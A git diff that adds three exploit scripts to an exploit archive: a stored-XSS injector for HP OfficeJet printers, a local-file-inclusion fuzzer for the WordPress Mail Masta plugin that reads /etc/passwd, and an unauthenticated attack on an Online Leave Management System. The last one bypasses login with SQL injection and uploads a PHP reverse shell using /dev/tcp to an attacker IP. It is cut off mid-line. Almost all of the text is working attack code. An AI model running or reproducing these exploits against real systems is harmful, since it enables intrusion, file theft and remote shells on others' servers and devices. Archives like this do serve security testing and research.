diff --git a/exploits/hardware/webapps/50227.py b/exploits/hardware/webapps/50227.py
new file mode 100755
index 000000000..c19a50aa5
--- /dev/null
+++ b/exploits/hardware/webapps/50227.py
@@ -0,0 +1,58 @@
+# Exploit Title: HP OfficeJet 4630/7110 MYM1FN2025AR 2117A – Stored Cross-Site Scripting (XSS)
+# Date: 01/08/2021
+# Exploit Author: Tyler Butler
+# Vendor Homepage: https://www8.hp.com/
+# Vendor Bulletin: https://support.hp.com/ie-en/document/ish_4433829-4433857-16/hpsbpi03742
+# Researcher Bulletin: https://tbutler.org/2021/04/29/hp-officejet-4630
+# Version: HP OfficeJet 7110 Wide Format ePrinter
+# Tested on: HP Officejet 4630 e-All-in-One Printer series model number B4L03A
+
+# PoC:
+import requests
+import json
+from requests.exceptions import HTTPError
+
+target = 'http://192.168.223.1' # The IP of the vulnerable taget
+payload = '''''' # The XSS injection payload you want to use
+path='/DevMgmt/ProductConfigDyn.xml' # Path location of the PUT command
+pre = '''
+
+
+
+
+
+
+''' # The start of the request body
+post = '''
+
+
+
+
+''' # The end of the request body
+body = pre + payload + post
+
+
+headers = {
+ 'Host':'192.168.223.1',
+ 'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0',
+ 'Accept':'*/*',
+ 'Accept-Language':'en-US,en;q=0.5',
+ 'Accept-Encoding':'gzip, deflate',
+ 'Content-Type':'text/xml',
+ 'Content-Length':str(len(body.encode('utf-8'))),
+ 'Origin':'https://192.168.223.1',
+ 'Connection':'close',
+ 'Referer':target,
+ }
+
+print('{!} Starting HP Officejet 4630 XSS Injector .... \n Author: Tyler Butler\n @tbutler0x90')
+try:
+ print('{!} Injecting payload :',payload)
+ response = requests.put(target+path, headers = headers, data = body)
+ response.raise_for_status()
+except HTTPError as http_err:
+ print('{X}',f'HTTP error occurred: {http_err}')
+except Exception as err:
+ print('{X}',f'Other error occurred: {err}')
+else:
+ print('{!} Success!')
\ No newline at end of file
diff --git a/exploits/php/webapps/50226.py b/exploits/php/webapps/50226.py
new file mode 100755
index 000000000..a1fc13497
--- /dev/null
+++ b/exploits/php/webapps/50226.py
@@ -0,0 +1,77 @@
+# Exploit Title: WordPress Plugin Mail Masta 1.0 - Local File Inclusion (2)
+# Date: 2021-08-24
+# Exploit Author: Matheus Alexandre [Xcatolin]
+# Software Link: https://downloads.wordpress.org/plugin/mail-masta.zip
+# Version: 1.0
+
+WordPress Plugin Mail Masta is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input.
+
+* Make sure to modify the wordlist path to your preferred wordlist. You can also download the one i used at Github:
+https://github.com/Xcatolin/Personal-Exploits/
+
+#!/usr/bin/python
+
+# Exploit for the Wordpress plugin mail-masta 1.0 LFI vulnerability
+
+import requests
+from requests.exceptions import ConnectionError
+
+class bcolors:
+ OKGREEN = '\033[92m'
+ WARNING = '\033[93m'
+ FAIL = '\033[91m'
+ ENDC = '\033[0m'
+ BOLD = '\033[1m'
+ ITALIC = '\33[3m'
+
+print(bcolors.BOLD + """\
+ __ __ _ _ __ __ _
+ | \/ |__ _(_) |___| \/ |__ _ __| |_ __ _
+ | |\/| / _` | | |___| |\/| / _` (_-< _/ _` |
+ |_| |_\__,_|_|_| |_| |_\__,_/__/\__\__,_|
+ _ _ ___ _ _ ___ _ _
+ | | ___ __ __ _| | | __(_) |___ |_ _|_ _ __| |_ _ __(_)___ _ _
+ | |__/ _ \/ _/ _` | | | _|| | / -_) | || ' \/ _| | || (_-< / _ \ ' \
+ |____\___/\__\__,_|_| |_| |_|_\___| |___|_||_\__|_|\_,_/__/_\___/_||_|
+
+
+ |_ . \_/ _ _ |_ _ |. _
+ |_)\/. / \(_(_||_(_)||| )
+ /
+ """ + bcolors.ENDC)
+
+endpoint = "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl="
+valid = "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"
+
+
+print (bcolors.WARNING + "[+] Insert the target including the WordPress instance:" + bcolors.ENDC)
+print (bcolors.ITALIC + "ex: http://target.com/wordpress\n" + bcolors.ENDC)
+target = raw_input("~# ")
+
+print (bcolors.WARNING + "[*] Checking if the target is alive..." + bcolors.ENDC)
+try:
+ request = requests.get(target)
+except ConnectionError:
+ print (bcolors.FAIL + "[X] Target not available. Please check the URL you've entered." + bcolors.ENDC)
+ exit(1)
+else:
+ print (bcolors.OKGREEN + "[!] Target up and running!\n" + bcolors.ENDC)
+
+print (bcolors.WARNING + "[*] Checking if the Mail-Masta endpoint is vulnerable..." + bcolors.ENDC)
+try:
+ response = requests.get(target + valid)
+except len(response.content) < 1000 :
+ print (bcolors.FAIL + "[X] Endpoint not vulnerable." + bcolors.ENDC)
+ exit(1)
+else:
+ print (bcolors.OKGREEN + "[!] Endpoint vulnerable!\n" + bcolors.ENDC)
+
+print (bcolors.WARNING + "[*] Fuzzing for files in the system..." + bcolors.ENDC)
+wordlist='wordlist.txt' ## Change here
+lines=open(wordlist, "r").readlines()
+
+for i in range(0, len(lines)):
+ word=lines[i].replace("\n","")
+ response = requests.get(target + endpoint + word)
+ if len(response.content) > 500 :
+ print (bcolors.OKGREEN + "[!] " + bcolors.ENDC) + "File",word,"found!"
\ No newline at end of file
diff --git a/exploits/php/webapps/50228.py b/exploits/php/webapps/50228.py
new file mode 100755
index 000000000..7511c45da
--- /dev/null
+++ b/exploits/php/webapps/50228.py
@@ -0,0 +1,81 @@
+# Exploit Title: Online Leave Management System 1.0 - Arbitrary File Upload to Shell (Unauthenticated)
+# Date: 24-08-2021
+# Exploit Author: Justin White
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html
+# Version: V1
+# Category: Webapps
+# Tested on: Linux
+
+
+#!/bin/env python3
+import requests
+import time
+import sys
+from colorama import Fore, Style
+
+if len(sys.argv) != 4:
+ print('python3 script.py ')
+ print('Example: python3 script.py http://127.0.0.1/ 10.0.0.1 4444')
+ exit()
+
+else:
+ try:
+ url = sys.argv[1]
+ attacker_ip = sys.argv[2]
+ attacker_port = sys.argv[3]
+ print()
+ print('[*] Trying to login...')
+ time.sleep(1)
+ login = url + '/classes/Login.php?f=login'
+ payload_name = "reverse_shell.php"
+ payload_file = r"""& /dev/tcp/\"{}\"/{} 0>&1'");?>""".format(attacker_ip, attacker_port)
+ session = requests.session()
+ post_data = {"username": "'' OR 1=1-- -'", "password": "'' OR 1=1-- -'"}
+ user_login = session.post(login, data=post_data)
+ cookie = session.cookies.get_dict()
+
+ if user_login.text == '{"status":"success"}':
+ print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')
+ upload_url = url + "/classes/Users.php?f=save"
+ cookies = cookie
+ headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------221231088029122460852571642112", "Origin": "http://localhost", "Connection": "close", "Referer": "http://localhost/leave_system/admin/?page=user"}
+ data = "-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n1\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nAdminstrator\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nAdmin\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\nadmin\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"img\"; filename=\"" + payload_name +"\"\r\nContent-Type: application/x-php\r\n\r\n\n " + payload_file + "\n\n\r\n-----------------------------221231088029122460852571642112--\r\n"
+ print('[*] Trying to Upload Reverse Shell...')
+ time.sleep(2)
+
+ try:
+ print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Reverse Shell Uploaded!')
+ upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)
+ upload_check = f'{url}/uploads'
+ r = requests.get(upload_check)
+ if payload_name in r.text:
+
+ payloads = r.text.split('